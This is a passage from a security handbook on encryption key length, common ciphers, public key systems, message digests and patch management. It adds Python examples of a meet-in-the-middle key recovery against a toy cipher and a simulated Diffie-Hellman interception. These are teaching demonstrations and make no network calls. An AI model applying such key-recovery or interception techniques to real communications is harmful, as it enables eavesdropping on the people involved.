In general, cryptographic strength is not proven; it is only disproven. When a new encryption algorithm is proposed, the author of the algorithm almost always believes that the algorithm offers complete security--that is, the author believes there is no way to decrypt an encrypted message without possession of the corresponding key. After all, if the algorithm contained a known flaw, then the author would not propose the algorithm in the first place (or at least would not propose it in good conscience). As part of studying the strength of an algorithm, a mathematician can show that the algorithm is resistant to specific kinds of attacks that have previously been shown to compromise other algorithms. Unfortunately, even an algorithm that is resistant to every known attack is not necessarily secure, because new attacks are constantly being developed.

From time to time, some individuals or corporations claim that they have invented new symmetric encryption algorithms that are dramatically more secure than existing algorithms. Generally, these algorithms should be avoided. As there are no known practical attacks against the well-studied encryption algorithms that are in wide use today, there is no reason to use new, unproven encryption algorithms--algorithms that might have flaws lurking in them.

Key Length with Symmetric Key Algorithms

Short keys can significantly compromise the security of encrypted messages, because an attacker can simply try every possible key until one decrypts the message into something meaningful. But while short keys provide comparatively little security, extremely long keys do not necessarily provide significantly more practical security than keys of moderate length.
That is, while keys of 40 or 56 bits are not terribly secure, a key of 256 bits does not offer significantly more real security than a key of 168 bits, or even a key of 128 bits.

If you are attempting to decrypt a message and do not have a copy of the key, the simplest way to decrypt the message is a brute force attack. These attacks are also called key search attacks, because they involve trying every possible key to see whether it decrypts the message. If the key was selected at random, then on average an attacker will need to try half of all the possible keys before finding the actual decryption key.

Inside a computer, a cryptographic key is represented as a string of binary digits. Each binary digit can be a 0 or a 1. Each added key bit doubles the number of possible keys. So how many bits is enough? That depends on how fast the attacker can try different keys and how long you wish to keep your information secure. If an attacker can try only 10 keys per second, then searching all 2^40 keys of a 40-bit key would take more than 3,484 years. Of course, today's computers can try many thousands of keys per second--and with special-purpose hardware and software, they can try hundreds of thousands. Key search speed can be further improved by running the same program on hundreds or thousands of computers at a time. Thus, it's possible to search a million keys per second or more using today's technology. If you have the ability to search a million keys per second, you can try all 40-bit keys in only 13 days.

If a key that is 40 bits long is clearly not sufficient to keep information secure, how many bits are necessary? If you could search a billion keys per second, trying all 80-bit keys would still require 38 million years. A 128-bit key search would require about 10^22 years with current technology, and even a quantum computer running Grover's search algorithm, which only halves the effective key length, would still face a 2^64 search.
As our Sun is likely to become a red giant within the next 4 billion years and, in so doing, destroy the Earth, a 128-bit encryption key should be sufficient for most cryptographic uses, assuming that there are no other weaknesses in the algorithm used.

Common Symmetric Key Algorithms

There are many symmetric key algorithms in use today. Some of the algorithms that are commonly encountered in the field of computer security are summarized below; a more complete list of algorithms is in (PUIS, 169-176):

DES
The Data Encryption Standard was adopted as a U.S. government standard in 1977 and as an ANSI standard in 1981. DES is a block cipher that uses a 56-bit key and has several different operating modes depending on the purpose for which it is employed. DES is a strong algorithm, but today the short key length limits its use. Indeed, in 1998 a special-purpose machine for "cracking DES" was built by the Electronic Frontier Foundation (EFF) for under $250,000. In one demonstration, working together with a coalition of computer users around the world, it found the key to an encrypted message in less than a day.

Triple-DES
Triple-DES is a way to make DES dramatically more secure by applying the DES algorithm three times with three different keys, for a total key length of 168 bits (the effective strength is about 112 bits, because of the meet-in-the-middle attack described next). Also called "3DES," this algorithm has been widely used by financial institutions and by the Secure Shell program (ssh). Simply using DES twice with two different keys does not improve its security to the extent that one might at first suspect, because of a known plaintext attack called meet-in-the-middle: the attacker encrypts the known plaintext under every possible first key and decrypts the matching ciphertext under every possible second key, then looks for a value that appears in both lists. The attack costs roughly 2 x 2^56 DES operations (plus a large table) instead of the 2^112 that a naive search of both keys together would need.

Blowfish
Blowfish is a fast, compact, and simple block encryption algorithm invented by Bruce Schneier.
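The meet-in-the-middle attack on double encryption, as an added example that is not part of the handbook. A 2^56-entry table for double DES would not fit in memory here, so the block uses a toy 4-round Feistel cipher with 16-bit keys and 32-bit blocks (a stand-in defined in the block, not a real cipher); the attack logic is exactly the one described above for double DES, and it recovers both keys with about 2 x 2^16 cipher operations instead of the 2^32 a naive search of both keys would need.

```python
"""Meet-in-the-middle against double encryption, with a toy Feistel cipher.

Added example, not from the handbook. The cipher is a deliberately tiny
16-bit-key, 32-bit-block Feistel network (an assumption so the attack runs in
about a second in pure Python); it stands in for DES. The attack is the real
one: encrypt the known plaintext under every first key, decrypt the ciphertext
under every second key, and look for a value that appears in both lists.
"""
from __future__ import annotations

KEY_BITS = 16
MASK16 = 0xFFFF
ROUNDS = 4


def _round_keys(key: int) -> list[int]:
    # Toy key schedule: one 16-bit subkey per round, derived from the key.
    return [((key * 0x9E37 + 0x1234 * (i + 1)) ^ (key >> (i + 1))) & MASK16
            for i in range(ROUNDS)]


def _f(half: int, subkey: int) -> int:
    # Toy round function. Any function works in a Feistel network: the
    # structure, not f, is what makes encryption invertible.
    x = (half ^ subkey) & MASK16
    x = (x * 0x2545 + 0x6F23) & MASK16
    return ((x << 5) | (x >> 11)) & MASK16


def encrypt(block: int, key: int) -> int:
    left, right = block >> 16, block & MASK16
    for subkey in _round_keys(key):
        left, right = right, left ^ _f(right, subkey)
    return (right << 16) | left        # swap the halves back at the end


def decrypt(block: int, key: int) -> int:
    # Same network run with the subkeys in reverse order.
    left, right = block >> 16, block & MASK16
    for subkey in reversed(_round_keys(key)):
        left, right = right, left ^ _f(right, subkey)
    return (right << 16) | left


def double_encrypt(block: int, k1: int, k2: int) -> int:
    return encrypt(encrypt(block, k1), k2)


def meet_in_the_middle(pairs: list[tuple[int, int]]) -> list[tuple[int, int]]:
    """Recover (k1, k2) from known plaintext/ciphertext pairs.

    Cost: 2 * 2^KEY_BITS cipher operations and a 2^KEY_BITS-entry table,
    versus 2^(2 * KEY_BITS) operations for trying every (k1, k2) together.
    """
    p0, c0 = pairs[0]
    # Forward half: middle value -> every k1 that produces it from p0.
    table: dict[int, list[int]] = {}
    for k1 in range(1 << KEY_BITS):
        table.setdefault(encrypt(p0, k1), []).append(k1)
    # Backward half: peel one layer off c0 under every k2 and look it up.
    found = []
    for k2 in range(1 << KEY_BITS):
        for k1 in table.get(decrypt(c0, k2), ()):
            # One pair leaves a few false matches; the other pairs weed them out.
            if all(double_encrypt(p, k1, k2) == c for p, c in pairs[1:]):
                found.append((k1, k2))
    return found


# Constructed demonstration: the two secret keys the attacker wants, and the
# known-plaintext pairs the attacker is assumed to have captured.
K1, K2 = 0xBEEF, 0x1337
KNOWN_PLAINTEXTS = [0x12345678, 0xCAFEBABE, 0x0BADF00D]
KNOWN_PAIRS = [(p, double_encrypt(p, K1, K2)) for p in KNOWN_PLAINTEXTS]

if __name__ == "__main__":
    for k1, k2 in meet_in_the_middle(KNOWN_PAIRS):
        print(f"recovered k1={k1:#06x} k2={k2:#06x}")
```

The same trade applies to DES: the table costs memory (2^56 entries) rather than time, which is why triple encryption, not double, was adopted, and why 3DES with three keys is rated at about 112 rather than 168 bits.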
Blowfish allows a variable-length key, up to 448 bits, and is optimized for execution on 32- or 64-bit processors. The algorithm is unpatented and has been placed in the public domain. Blowfish is used in the Secure Shell and other programs.

IDEA
The International Data Encryption Algorithm (IDEA) was developed in Zurich, Switzerland, by James L. Massey and Xuejia Lai and published in 1990. IDEA uses a 128-bit key. IDEA is used by the popular program PGP to encrypt files and electronic mail. Unfortunately, wider use of IDEA has been hampered by a series of software patents on the algorithm, which are currently held by Ascom-Tech AG in Solothurn, Switzerland.

RC4
This stream cipher was originally developed by Ronald Rivest and kept as a trade secret by RSA Data Security. The algorithm was revealed by an anonymous Usenet posting in 1994. RC4 allows keys between 1 and 2048 bits. Weaknesses in its key scheduling are known (the WEP flaw described below exploits them), so it must be used with great care and is not a good choice for new designs.

Rijndael (AES)
This block cipher was developed by Joan Daemen and Vincent Rijmen, and chosen in October 2000 by the National Institute of Standards and Technology to be the United States' new Advanced Encryption Standard. Rijndael is an extraordinarily fast and compact cipher that can use keys that are 128, 192, or 256 bits long.

Cryptographers establish the strength of their algorithms through a process of peer review. When an algorithm is published, other cryptographers may look for flaws or weaknesses. Do not trust people who say they've developed a new encryption algorithm, but also say that they don't want to disclose how the algorithm works because such disclosure would compromise the strength of the algorithm. In practice, there is no way to keep an algorithm secret: true security lies in openness. On the other hand, it's important to realize that simply publishing an algorithm or a piece of software does not guarantee that flaws will be found.
The WEP (Wired Equivalent Privacy) encryption scheme used by the 802.11 wireless networking standard was published for many years before a significant flaw was found in it--the flaw had been there all along, but no one had bothered to look for it.

One-Time Pads

There is a provably unbreakable symmetric key cryptosystem: the one-time pad. In a one-time pad system, the communicating parties share a key composed of a very long stream of random bytes (at least as long as the message that is to be sent). The message is encrypted and decrypted by transforming each byte of the message with one byte of the key, after which that key byte is discarded and never used again. Because the key is random and never reused, even a key search attack is useless: every possible message of the same length can be produced by some key, so the ciphertext alone gives the attacker no way to tell the right one from the wrong ones. Reusing any part of the key destroys this guarantee; combining two ciphertexts encrypted under the same key bytes cancels the key and exposes the relationship between the two plaintexts.

Unfortunately, one-time pads have several limitations that make them impractical. In addition to the usual symmetric encryption problems of securely distributing and managing keys, generating large amounts of truly random data is not always straightforward, and distributing large amounts of key material can be difficult. Nevertheless, this system is sometimes used for extremely high-security communications links.

Public Key Algorithms

Public key algorithms are more difficult to create than symmetric key algorithms, and there are fewer in use. Because the keys of symmetric and asymmetric encryption algorithms are used in fundamentally different ways, it is not possible to infer the relative cryptographic strength of these algorithms by comparing the length of their keys. Key lengths in public key algorithms typically range from 512 to 2048 or 4096 bits; for most users, 1024 bits have been considered sufficient for the foreseeable future, but recommended lengths grow as computing power and factoring methods improve, so check current guidance before settling on a size. The following list summarizes the public key systems in common use today:

Diffie-Hellman key exchange
A system for exchanging cryptographic keys between active parties.
Diffie-Hellman is not actually a method of encryption and decryption, but a method of developing and exchanging a shared secret key over a public communications channel. In effect, the two parties agree on some common numerical values, and then each party creates a secret value of its own. Mathematical transformations of the secret values are exchanged. Each party can then calculate a third value, the shared session key, which cannot easily be derived by an attacker who knows only the two exchanged values. The basic exchange does not, however, authenticate either party: an active attacker who can intercept and replace the exchanged values can run a separate exchange with each side and read everything. In practice the exchanged values must therefore be authenticated, for example with digital signatures.

DSA/DSS
The Digital Signature Standard (DSS) was developed by the U.S. National Security Agency and adopted as a Federal Information Processing Standard (FIPS) by the National Institute of Standards and Technology. DSS is based on the Digital Signature Algorithm (DSA). Although DSA allows keys of any length, only keys between 512 and 1024 bits were permitted under the original DSS FIPS. As specified, DSS can be used only for digital signatures, although it is possible to use some DSA implementations for encryption as well.

Elliptic curves
Elliptic curve cryptosystems are public key systems whose security rests on the discrete logarithm problem in the group of points on an elliptic curve, rather than in the multiplicative group of integers modulo a prime. Their advantage stems from the fact that, for well-chosen curves, no subexponential-time algorithm for computing elliptic curve discrete logarithms is known. Thus, comparatively short keys in elliptic curve cryptosystems can offer a high degree of security while remaining very fast to compute. Elliptic curve operations can also be implemented very efficiently in hardware.

RSA
RSA is a well-known public key cryptography system developed in 1977 by three professors then at MIT: Ronald Rivest, Adi Shamir, and Leonard Adleman. RSA can be used both for encrypting information and as the basis of a digital signature system. Digital signatures can be used to prove the authorship and authenticity of digital information.
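The Diffie-Hellman exchange described above, carried through to the session key a hybrid cryptosystem would hand to its symmetric cipher, as an added example that is not part of the handbook. Both parties are simulated in one process; the only values that would cross the network are the ones named *_pub. The group is the 1024-bit MODP group from RFC 2409, transcribed by hand (the block re-checks the properties it depends on) and chosen because it matches the key sizes the text discusses, not because 1024 bits is still enough: current guidance calls for 2048-bit or larger groups (RFC 3526) or elliptic-curve groups. The second function shows the failure mode noted above: without authentication, an interceptor ends up sharing a key with each side.

```python
"""Diffie-Hellman key agreement, session-key derivation, and the
unauthenticated-exchange failure mode. Added example, not from the handbook;
standard library only.
"""
from __future__ import annotations

import hashlib
import secrets

# RFC 2409 "Second Oakley Group" (1024-bit MODP), transcribed by hand; the
# group_is_sane() check below re-verifies it. Too small for real use today.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381"
    "FFFFFFFFFFFFFFFF", 16)
G = 2
Q = (P - 1) // 2   # P is a safe prime, so G generates a subgroup of prime order Q


def _probably_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin with random bases."""
    if n < 4:
        return n in (2, 3)
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def group_is_sane() -> bool:
    """P and Q both prime (safe prime) and G inside the order-Q subgroup."""
    return _probably_prime(P) and _probably_prime(Q) and pow(G, Q, P) == 1


def keypair() -> tuple[int, int]:
    """Fresh secret exponent and the public value that goes over the wire."""
    private = secrets.randbelow(Q - 1) + 1      # 1 <= x < Q
    return private, pow(G, private, P)


def session_key(my_private: int, peer_pub: int) -> bytes:
    """Derive the symmetric session key a hybrid system would give to AES."""
    # A peer value outside the subgroup (0, 1, P-1, ...) would let an active
    # attacker force the shared secret into a handful of known values.
    if not 2 <= peer_pub <= P - 2 or pow(peer_pub, Q, P) != 1:
        raise ValueError("peer value is not in the prime-order subgroup")
    shared = pow(peer_pub, my_private, P)
    return hashlib.sha256(shared.to_bytes(128, "big")).digest()


def accepts_peer_value(peer_pub: int) -> bool:
    try:
        session_key(1, peer_pub)
        return True
    except ValueError:
        return False


def honest_exchange() -> tuple[bytes, bytes]:
    """Alice and Bob each send only their public value; the keys must agree."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    return session_key(a_priv, b_pub), session_key(b_priv, a_pub)


def intercepted_exchange() -> tuple[bytes, bytes, bytes, bytes]:
    """Mallory replaces both public values with her own: each side now shares
    a key with Mallory, and the two sides' keys no longer match."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    m_priv, m_pub = keypair()
    alice_key = session_key(a_priv, m_pub)      # Alice believes m_pub is Bob's
    bob_key = session_key(b_priv, m_pub)        # Bob believes m_pub is Alice's
    mallory_to_alice = session_key(m_priv, a_pub)
    mallory_to_bob = session_key(m_priv, b_pub)
    return alice_key, bob_key, mallory_to_alice, mallory_to_bob


if __name__ == "__main__":
    print("group sane:", group_is_sane())
    ka, kb = honest_exchange()
    print("honest keys agree:", ka == kb)
    ak, bk, ma, mb = intercepted_exchange()
    print("intercepted: alice==mallory", ak == ma, "bob==mallory", bk == mb, "alice==bob", ak == bk)
```

Hashing the shared secret, rather than using its raw bytes, is what real protocols do as well: it spreads the entropy evenly and yields exactly the key size the symmetric cipher wants.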
RSA keys may be any length, depending on the particular implementation used.

Message Digest Functions

Message digest functions distill the information contained in a file (small or large) into a single large number, typically between 128 and 512 bits in length. The best message digest functions combine these mathematical properties:

a. Every bit of the message digest function's output is potentially influenced by every bit of the function's input.
b. If any given bit of the function's input is changed, every output bit has a 50 percent chance of changing.
c. Given an input file and its corresponding message digest, it should be computationally infeasible to find another file with the same message digest value.

In theory, two different files can have the same message digest value. This is called a collision. For a message digest function to be secure, it should be computationally infeasible to find or produce these collisions.

Many message digest functions have been proposed and are now in use. Here are a few:

MD2
Message Digest #2, developed by Ronald Rivest. This message digest is probably the most secure of Rivest's message digest functions, but takes the longest to compute. As a result, MD2 is rarely used. MD2 produces a 128-bit digest.

MD4
Message Digest #4, also developed by Ronald Rivest. This message digest algorithm was developed as a fast alternative to MD2. Subsequently, MD4 was shown to be weak: collisions can be found far faster than by brute force search. (Because of the birthday paradox, a brute force collision search on a 128-bit digest takes about 2^64 operations; finding a second file with a given digest by brute force takes about 2^128, which is infeasible for the same reason that searching a 128-bit keyspace is infeasible.) MD4 produces a 128-bit digest.

MD5
Message Digest #5, also developed by Ronald Rivest. MD5 is a modification of MD4 that includes techniques designed to make it more secure.
Although widely used, in the summer of 1996 a few flaws were discovered in MD5 that allowed some kinds of collisions in a weakened form of the algorithm to be calculated. As a result, MD5 is slowly falling out of favor, and practical collision attacks against the full algorithm have since been published, so it should not be relied on where collision resistance matters. MD5 and SHA-1 are both used in SSL and in Microsoft's Authenticode technology. MD5 produces a 128-bit digest.

SHA
The Secure Hash Algorithm, related to MD4 and designed for use with the National Institute of Standards and Technology's Digital Signature Standard (NIST's DSS). Shortly after the publication of the SHA, NIST announced that it was not suitable for use without a small change. SHA produces a 160-bit digest.

SHA-1
The revised Secure Hash Algorithm incorporates minor changes from SHA. It is not publicly known whether these changes make SHA-1 more secure than SHA, although many people believe that they do. SHA-1 produces a 160-bit digest. Collision attacks on SHA-1 have also since been demonstrated; prefer the SHA-2 functions below for new work.

SHA-256, SHA-384, SHA-512
These are, respectively, 256-, 384-, and 512-bit hash functions designed to be used with 128-, 192-, and 256-bit encryption algorithms. These functions were proposed by NIST in 2001 for use with the Advanced Encryption Standard.

Besides these functions, it is also possible to use a traditional symmetric block cipher such as DES as a message digest function. To do so, run the cipher in cipher feedback mode with a randomly chosen, application-specific key, encrypt the entire input file, and take the last block of encrypted data as the digest. Note what this construction really is: a keyed message authentication code, not a public hash function. Anyone who knows the key can manufacture collisions at will, and the simple form is only sound for messages of a fixed length, so the key must be kept secret and the message length must be fixed or included in the input. Symmetric ciphers used this way produce good fingerprints, but they are significantly slower than the message digest functions described previously.

Message digest functions are a powerful tool for detecting very small changes in very large files or messages: calculate the digest of your file (one of the SHA-2 functions rather than MD5, for new work) and set it aside.
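The set-aside-and-recompute check just described, and the keyed message authentication code (RFC 2104 HMAC) that the next paragraphs describe, as an added example that is not part of the handbook. The file contents and the single-bit tampering are constructed for the demonstration; everything else is the Python standard library. The avalanche count (about half of the 256 output bits changing for a one-bit input change) is property (b) from the list above made visible.

```python
"""Integrity checking with a message digest, and a keyed MAC per RFC 2104.

Added example, not from the handbook; standard library only. The "file"
contents and the keys are constructed here so the example runs offline.
"""
from __future__ import annotations

import hashlib
import hmac
import secrets

# Constructed sample file; in practice read the bytes from disk.
ORIGINAL = (b"root:x:0:0:root:/root:/bin/bash\n"
            b"alice:x:1000:1000::/home/alice:/bin/bash\n")
TAG_LEN = hashlib.sha256().digest_size


def digest(data: bytes, algorithm: str = "sha256") -> str:
    """Hex fingerprint of data. Keep the result where an attacker cannot edit it."""
    return hashlib.new(algorithm, data).hexdigest()


def unchanged(data: bytes, stored_digest: str, algorithm: str = "sha256") -> bool:
    """Recompute the fingerprint and compare it with the one set aside earlier."""
    return hmac.compare_digest(digest(data, algorithm), stored_digest)


def differing_bits(hex_a: str, hex_b: str) -> int:
    """How many output bits differ between two digests (the avalanche property)."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def protect(key: bytes, message: bytes) -> bytes:
    """Append an HMAC-SHA256 tag; only a holder of key can produce a valid one."""
    return message + hmac.new(key, message, hashlib.sha256).digest()


def check(key: bytes, blob: bytes) -> bytes | None:
    """Return the message if its tag verifies, else None.

    compare_digest runs in constant time, so the comparison does not leak how
    many bytes of a forged tag happened to be right.
    """
    if len(blob) < TAG_LEN:
        return None
    message, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return message if hmac.compare_digest(expected, tag) else None


def flip_bit(data: bytes, bit: int) -> bytes:
    """Constructed tampering: invert one bit of data."""
    out = bytearray(data)
    out[bit // 8] ^= 1 << (bit % 8)
    return bytes(out)


def demo() -> dict:
    stored = digest(ORIGINAL)             # set aside while the file is known good
    tampered = flip_bit(ORIGINAL, 3)      # 'r' of "root" becomes 'z'
    key = secrets.token_bytes(32)         # shared secret for the MAC
    blob = protect(key, ORIGINAL)
    forged = flip_bit(blob, 8 * 32)       # attacker edits the second line
    return {
        "original_passes": unchanged(ORIGINAL, stored),
        "tampered_detected": not unchanged(tampered, stored),
        "bits_changed_of_256": differing_bits(stored, digest(tampered)),
        "mac_accepts_genuine": check(key, blob) == ORIGINAL,
        "mac_rejects_forgery": check(key, forged) is None,
        "mac_rejects_wrong_key": check(secrets.token_bytes(32), blob) is None,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The digest check catches any change but only if the stored digest is out of the attacker's reach; the MAC moves that requirement from the stored value to the key, which is why it is the right tool when the data travels over a network.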
If you think that the file has been changed (either accidentally or on purpose), simply recalculate the digest and compare it with the one you originally calculated. If they match, you can assume that the file was not modified, provided the stored digest itself was kept where an attacker could not alter it. An attacker who can change the file can usually change a digest stored alongside it, which is why a digest alone protects against accidents and casual tampering, while a keyed MAC or a digital signature is needed against a determined adversary.

Because of their properties, message digest functions are also an important part of many cryptographic systems in use today. Message digests are the basis of most digital signature standards. Instead of signing the entire document, most digital signature standards specify that the message digest of the document be calculated. It is the message digest, rather than the entire document, that is actually signed.

Message digests can also be readily used for message authentication codes (MACs), which use a shared secret between two parties to prove that a message is authentic. MACs are appended to the end of the message to be verified. (RFC 2104 describes how to use keyed hashing for message authentication.) MACs based on message digests provide the "cryptographic" security for most of the Internet's routing protocols.

Maintaining Integrity

Maintaining the integrity of information stored on your computers is critical to overall security and reliable operation. You must ensure the integrity of your operating system, the integrity of your applications, and the integrity of your data. For operating systems and applications, this requires not only monitoring for unwanted changes to your software, but also applying necessary security patches and updates to keep your software protected.

Keeping Systems Up to Date

From the moment a workstation or server is connected to the Internet, it is open to discovery and attempted access by unwanted outsiders. Attackers find new Internet hosts with amazing speed. Detailed reports on the aggressiveness of attackers can be found at the website maintained by The Honeynet Project, http://project.honeynet.org/.
In one case, a newly configured Honeynet system was successfully penetrated 15 minutes after the computer was placed on the network. It is thus imperative that any system that will be on a network be kept up to date with security fixes, both before connecting it to the network and after.

Software Management Systems

A software management system is a set of tools and procedures for keeping track of which versions of what software you have installed, and whether any local changes have been made to the software or its configuration files. Without such a system, it is impossible to know whether a piece of software needs to be updated or what local changes have been made and need to be preserved after the update. Using some software management system to keep up to date is essential for security purposes, and useful for non-security upgrades as well. Fortunately, nearly all Unix systems and Microsoft NT-based systems provide some form of software management for the core components of the operating system and the applications distributed with it. The most common approaches are managing packages (precompiled executables and supporting files) and managing the software source code from which executables can be compiled and installed.

Package-based Systems

A typical package file is a file containing a set of executable programs, already compiled, along with any supporting files such as libraries, default configuration files, and documentation.
Under most packaging systems, the package also contains some meta-data, such as:

· Version information for the software it contains
· Information about compatible operating system versions or hardware architectures
· Lists of other packages that the package requires
· Lists of other packages with which the package conflicts
· Lists of which included files are configuration files (or otherwise likely to be changed by users once installed)
· Commands to run before, during, or after the included files are installed

The other important component of a package-based system is a database of which versions of which packages have been installed on the system. On Windows systems, the Registry often serves this purpose.

Package-based systems are easy to use: with a simple command or two, a system administrator can install new software or upgrade the current software when a new or patched version is released. Because the packaged executables are already compiled for the target operating system and hardware platform, the administrator doesn't have to spend time building (and maybe even porting) the application. On the other hand, packages are compiled to work on the typical installation of the operating system, and not necessarily on your installation. If you need to tune your applications to work with some special piece of hardware, adapt them to an unusual authentication system, or simply compile them with an atypical configuration setting, source code will likely be more useful to you, if it is available. This is often the case with the kernel on Unix operating systems, for example.

Commercial systems that don't provide source code are obvious candidates for package-based management. Solaris 2.x, for example, provides the pkgadd, pkgrm, pkginfo, and showrev commands (and others) for adding, removing, and querying packages from the shell, and admintool for managing software graphically.
Microsoft Windows systems use the web-based Windows Update to download and install updates to the operating system and core utilities.

Package management isn't only for commercial systems. Free software Unix distributions provide package management systems to make it easier for system administrators to keep the system up to date. Several Linux distributions have adopted the RPM Package Manager (RPM) system. This system uses a single command, rpm, for all of its package management functions. Debian GNU/Linux uses an alternative package management system called dpkg. The BSD-based Unix systems focus on source-based updates, but also provide a collection of precompiled packages that are managed with the pkg_add, pkg_delete, and pkg_info commands.

Source-based Systems

In contrast to package-based systems, source-based systems focus on helping the system administrator maintain an up-to-date copy of the operating system's or application's source code, from which new executables can be compiled and installed. Source-based management has its own special convenience: a source-based update comes in only a single version, as opposed to compiled packages, which must be separately compiled and packaged for each architecture or operating system on which the software runs. Source-based systems can also be particularly useful when it's necessary to make local source code changes.

From a security standpoint, building packages from source code can be a mixed blessing. On the one hand, you are free to inspect the source code and determine whether there are any lurking bugs or Trojan horses. In practice, such inspection is difficult and rarely done. Moreover, if an attacker can get access to your source code, it is not terribly difficult for the attacker to add a Trojan horse of her own! To avoid this problem, you need to be sure both that the source code you are compiling is for a reliable application and that you have the genuine source code (for example, by checking the vendor's digital signature or published digest of the archive before building it).
Source code and patches
The simplest approach to source management is to keep application source code available on the system and recompile it whenever it changes. When a patch to an application is released, it typically takes the form of a patch diff, a file that describes which lines in the old version should be changed, removed, or added in order to produce the new version. The diff program produces these files, and the patch program is used to apply them to an old version to create the new version. After patching the source code, the system administrator recompiles and reinstalls the application.

For example, FreeBSD and related versions of Unix distribute many applications in their ports collection. An application in the ports collection consists of the original source code from the application's author along with a set of patches that have been applied to better integrate the application into the BSD environment. The makefiles included in the ports system automatically build the application, install it, and then register the application's files in the BSD package database, the same one that pkg_add uses. This approach is widely used for maintaining third-party software on FreeBSD systems.

CVS
Another approach to source management is to store the source code on a server using a source code versioning system such as the Concurrent Versions System (CVS), and configure the server to allow anonymous client connections. Users who want to update their source code to the latest release use the cvs program to "check out" the latest patched version from the remote server's repository. The updated code can then be compiled and installed. FreeBSD, NetBSD, and OpenBSD use CVS to distribute and maintain their core operating system software. In addition, tens of thousands of open source software projects maintain CVS servers of their own, or are hosted at sites such as sourceforge.net that provide CVS repositories.
A good reference on CVS is Essential CVS, published by O'Reilly and Associates.

Updating System Software

It is imperative that you ensure that patches are available for all known security problems in the software you run, that you find those patches, and that you apply them, ideally before the system is connected to a network. Similarly, once the system is up and running, you must be vigilant to learn about newly discovered security problems in your operating system and applications so as to apply patches for them as they become available.

The most secure way to patch a new installation is to download the patches to another computer that's already connected to the Internet and updated with the latest security patches (perhaps a Mac or PC client that runs no server services). Once downloaded, they can be burned onto a CD or transferred to the new system using a local network connection, and applied. This approach is also convenient if you have many computers running the same operating system to update, and a slow network connection. Updates can be transferred once, and then applied on each machine from the CD. For Microsoft systems, the Windows Update Catalog web site provides downloadable updates that can be used in this fashion.

If no other Internet-connected host is available or suitable, the new host may have to be connected before the patches are applied. In this case, disable all network servers on the machine, make the connection as brief as possible (only long enough to download the required patches), and then physically remove the machine from the network while the patches are applied.
This process can be made even more secure if the machine's connection can be protected by a stateful firewall or a router that implements network address translation, so that the only packets that can reach the new host are those associated with a connection initiated by the new host.

You can't stay up to date with software that you don't know you've installed. An important component of any ongoing updating process is to inventory your system and keep track of new applications that you've installed. Operating systems that use packages usually provide commands that will let you determine which packages you have installed. Source-based software management typically relies on keeping all of the source code to the installed applications in a single location where it can be easily found.

Learning about patches
There are several avenues for learning about security problems and patches for operating systems and applications.

· Every Unix operating system and most major applications, such as web servers, have an associated mailing list for announcements of new versions. Microsoft offers e-mail notification of security bulletins through the Microsoft Profile Center (http://register.microsoft.com/regsys/pic.asp). Many vendors maintain a separate list for announcements of security-related issues. Subscribe to these lists and pay attention to the messages.
· Several mailing lists, such as BugTraq and NT-BugTraq, collect and distribute security alerts for many products. Subscribe to these lists (perhaps in digest form) and pay attention to the messages.
· Many operating system and application developers post security and release announcements in relevant USENET newsgroups (for example, the BIND name server announcements appear in comp.protocols.dns.bind). Skim these newsgroups regularly.
· If your vendor provides a subscription patch CD service, consider subscribing.
Although these CDs may not provide up-to-the-minute patches, they can save a lot of time when bringing up a new system by reducing the number of patches that need to be downloaded.

· Automatic update systems compare installed packages with the latest versions of packages available on the vendor's web site and report which packages are out of date. Most can also be configured to download and install the upgraded packages automatically, which can be useful if you don't change your configuration from the vendor defaults and you trust the vendor to upgrade your system. Some can be run automatically on a scheduled basis; others must be run manually.

· Finally, you can manually check the vendor's web site on a regular basis for new versions of software.

Once you learn about a security patch, don't wait: apply it immediately. Vulnerabilities that become public begin to be exploited almost immediately. (Patches that add new features, rather than fixing security vulnerabilities, do not require the same urgency.)

Downloading and Verifying Patches

Whether you use packages or source code, you have to get the files from somewhere. Vendors typically make their applications available on the Internet through the World Wide Web or an anonymous FTP site. When an operating system or application is popular, however, a single web site or FTP site can't keep up with the demand to download it, so many software vendors arrange to have other sites serve as mirrors for their site. Users are encouraged to download the software from the mirror site closest (in network geography) to them. In principle, all of the software on the vendor's site is replicated to each mirror site on a regular (often daily) basis. Mirror sites provide an important security benefit by making the availability of software more reliable through redundancy.
They are also useful when you have a fast network connection to the mirror site but a slow connection to the principal site. On the other hand, mirror sites also create some security concerns:

· The administrators of the mirror site control their local copies of the software, and may have the ability to corrupt it, replace it with a trojaned version, and so on. You must trust not only the vendor but also the administrators of the mirror site. If the vendor distributes digital signatures along with the software (for example, detached PGP signatures with source code archives, GnuPG signatures in RPM files, or ActiveX code signatures), you can be more confident that you're receiving the software as released by the vendor, as long as you acquire the vendor's public key directly, not through the mirror! Some update systems automatically check signatures before an update will be applied.

· Even if you trust the mirror, daily updating may not be fast enough. If a critical security patch is released, you may not have time to wait 24 hours for your local mirror to be updated. In these cases, there is no substitute for downloading the patch directly from the vendor as soon as possible.

Using a mirror site is thus a trade-off between the convenience of a high-speed download when you want it and the necessity of possibly extending your trust to a third party.

Be very wary of applying patches found in mailing lists and on bulletin boards: at worst, they may be planted to trick people into installing a new vulnerability. At best, they are often produced by inexperienced programmers whose systems are unlike yours, so their solutions may cause more damage than they fix.

Upgrading applications

Under Unix-based package management systems, upgrading a package is usually a very simple procedure.
For example, to upgrade the bzip2-devel package on a system that uses the RPM package manager:

    # ls -l *.rpm
    -rw-r--r--    1 root     root        33708 Apr 16 23:15 bzip2-devel-1.0.2-2.i386.rpm
    # rpm -K bzip2-devel-1.0.2-2.i386.rpm          (check the checksum and signature)
